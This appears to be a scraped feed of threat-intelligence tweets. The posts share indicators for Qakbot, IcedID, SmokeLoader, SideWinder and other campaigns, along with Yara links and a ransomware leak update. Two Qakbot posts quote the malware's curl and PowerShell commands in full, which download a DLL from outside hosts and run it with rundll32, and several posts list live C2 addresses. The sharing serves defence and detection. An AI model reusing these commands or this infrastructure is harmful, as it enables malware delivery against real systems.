null

#Qakbot - obama267 - .pdf > .zip > curl > .dll wscript.exe Calculation-of-costs.js cmd.exe /c mkdir C:\Poliset\Nolser & curl https://skagnechri.]com/0.29.dat --output C:\Poliset\Nolser\file.OOCCXX rundll32 C:\Poliset\Nolser\file.OOCCXX,menu IOC's github.com/pr0xylife/Qakb…

A New IOC of #sidewinder #APT we discovered on 19th May. Keep tracking for more #sidewinder intelligence😃. mofss.co Check it out: threatbook.io/domain/mofss.co #ThreatHunting #ThreatIntelligence #threats #infosec #cybersecurity #cybercrime #SOC #CTI

#Qakbot - obama248 - .xhtml > .wsf > ps > .dll wscript.exe AprilINV(f3354).wsf powershell.exe -ENC $Muckhole = ("http://45.66.248.25/vodka.dat") foreach ($Hydro in $Muckhole) {try {wget $Hydro -O $env:TEMP\vodka rundll32 $env:TEMP\vodka,X555 IOC's github.com/pr0xylife/Qakb…

At Starbucks today when a guy went to the washroom for about four minutes: - Bag left - Phone left - Laptop unlocked - RDP'd into a server - Code open Don't be this guy. #opsec #infosec #fail

@brkoduru nicely explained

Here's my blog on #Qakbot malware with threat detections using #osquery Qakbot seen in below campaigns: ⛔️OneNote Campaign ⛔️WSF Campaign ⛔️HTML Smuggling Campaign Blog: research.loginsoft.com/threat-researc… #threatintelligence #malware #threathunting #DFIR

#smokeloader tread based on the targeting country

#SmokeLoader unpacking with x64dbg Yara rule to detect Smoke loader: github.com/xRY0D4N/Yara-R… Sample: hybrid-analysis.com/sample/d526ffd…

#opendir hosting various tunnelers #ligolo #quic #fastreverseproxy #bore #chisel and #phonyc2 91.235.234[.]130:8000 PhonyC2: 91.235.234[.]130:443 Previously observed #Meterpreter C2 from .bash_history: 194.61.121[.]86:8443 Zip of PhonyC2: 5dd7c5c8dfc1f513fe93aa775cbde6f1

@ryodan0x share the email header if possible

I took a look at #Qakbot the PDF has a button > download zip file > extract WSF script WSF script launches powershell powershell connecting to C2 domains and downloading DLL then executing it Yara rule and powershell script extracted: github.com/xRY0D4N/Yara-R… #malware

@Jrod_R87 best of luck

So begins my journey to get the OSCP. Wish me luck.

@josh_penny @sangamcse

#Donot, linked to 🇮🇳#India, targets specific countries including 🇧🇩🇱🇰🇵🇰. They've expanded to embassies in the US and Europe, using "yty" #malware to attack Mil & Gov orgs. Despite being considered "low" in sophistication, they persist until they succeed. #APT IPs & Domains 👇👇

@fuyinglab this file is not in VT

A new type of #Botnet called #Komorebi is spreading quickly. #ip：91.239.100.100 #Komorebi-init #Domorebi #hash：19691fed2a086ca0aa17c4b38434c433

#Zeroday in #iPhone and #Android blog.google/threat-analysi… #cyberattack #malware #Pentesting

never use freevpn

LockBit just reposted 9 companies ( [+] 2 new )all to leak within 24 hours except the Government of Medellín, Columbia which is set to leak in about 40 minutes. /medellin.gov.co #cybersecurity #infosec #lockbit

New Icedid Malware campaign Phishing Email > Encrypted ZIP > ISO image > LNK > DLL execution via Rundll32.exe f3a9b733cb33c4d257589e70c8d9cf4b5136cb3932bce2ea1b31bc9d5b06a5ae C2: trbiriumpa[.]com Unpacked Sample -> b1566f9c7ffa839554b96575e2a34ea79416f03df75b5048f561e96808975555

#APT #SideWinder zip -> lnk -> hta ZIP MD5: e5ea6fd2e0f6f546b5842cd9d4a45628 LNK MD5: 567e1394ecfa630a350f5014ed1ae229 URL: https://mail.tsinghua[.]institute/3206/1/25395/2/0/1/1863616521/3DIm0LGMztTur2KVczxFjB36rLfwnHf9DwWAo2oI/files-5b71f8ef/hta @Tsinghua_Uni could be a target